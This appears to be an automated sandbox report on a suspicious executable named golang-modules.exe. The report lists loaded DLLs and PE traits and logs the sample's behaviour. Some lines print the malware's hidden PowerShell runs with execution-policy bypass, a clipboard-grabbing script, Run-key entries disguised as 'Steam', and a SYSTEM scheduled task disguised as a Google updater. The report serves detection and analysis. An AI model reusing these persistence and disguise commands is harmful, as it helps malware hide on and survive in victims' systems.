Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: golang-modules.exeStatic PE information: More than 8191 > 100 exports found
Source: golang-modules.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: golang-modules.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: golang-modules.exeStatic file information: File size 39414942 > 1048576
Source: golang-modules.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1050600
Source: golang-modules.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc83a00
Source: golang-modules.exeStatic PE information: More than 200 imports for KERNEL32.dll
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: golang-modules.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: golang-modules.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmp
Source: golang-modules.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: golang-modules.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: golang-modules.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: golang-modules.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: golang-modules.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.cmdline"
Source: golang-modules.exeStatic PE information: section name: _RDATA
Source: b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442.0.drStatic PE information: section name: _RDATA
Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFE7C7700BD pushad ; iretd 15_2_00007FFE7C7700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFE7C7719D2 push eax; iretd 15_2_00007FFE7C7719F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFE7C77199F push eax; iretd 15_2_00007FFE7C7719F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFE7C7800BD pushad ; iretd 17_2_00007FFE7C7800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFE7C7500BD pushad ; iretd 25_2_00007FFE7C7500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FFE7C7600BD pushad ; iretd 53_2_00007FFE7C7600C1

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.dllJump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-d2MzMX\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-d2MzMX\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Powershell "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CzwstUXyiQEbaNB.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Powershell
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Steam
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Powershell
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Steam
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Steam
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Steam
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Steam

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\golang-modules.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
